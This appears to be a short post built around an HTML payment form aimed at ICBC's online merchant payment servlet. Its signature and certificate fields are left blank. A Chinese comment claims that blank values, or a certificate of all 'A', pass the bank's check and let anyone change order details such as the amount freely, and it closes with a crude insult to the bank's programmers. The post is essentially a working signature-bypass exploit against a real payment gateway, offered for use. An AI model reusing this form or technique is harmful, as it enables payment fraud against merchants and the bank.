<form name="sendOrder" method="post" action="https://mybank.icbc.com.cn/servlet/com.icbc.inbs.b2c.pay.B2cMerPayReqServlet">
<input type="hidden" name="merchantid" value="310000010022" >
<!-- 商户代号 -->
<input type="hidden" name="interfaceType" value="HS">
<!-- 传输协议 -->
<input type="hidden" name="merURL" value=http://shop.luckup.net/>
<!-- 回复地址 -->
<input type="hidden" name="orderid" value="6332">
<!-- 定单号 -->
<input type="hidden" name="amount" value="35.50">
<!-- 定单金额 -->
<input type="hidden" name="curType" value="001">
<!-- 货币类型 -->
<input type="hidden" name="hsmsgType" value="0">
<!-- 返回信息类型 -->
<input type="hidden" name="signMsg" value="">
<!-- 签名数据 -->
<input type="hidden" name="cert" value="">
<!-- 证书 -->
<input type="hidden" name="comment1" value=" ">
<!-- 保留字段1 -->
<input type="hidden" name="comment2" value=" ">
<!-- 保留字段2 -->
<img src="/images/icbclglogo.gif" align="absmiddle" width="100" height="38">
<input type="submit" value="工行支付">(全国范围内开通)
</form>
当signMsg和cert的值为空或 signMsg的值为空,cert的值全为A是都能通过工行的认证,这样就可以自由修改定单信息,查资料得出,此漏洞在2004年12月就有人发现了,但工行至今没有修复该漏洞,不知工行的程序员是否是吃屎长大的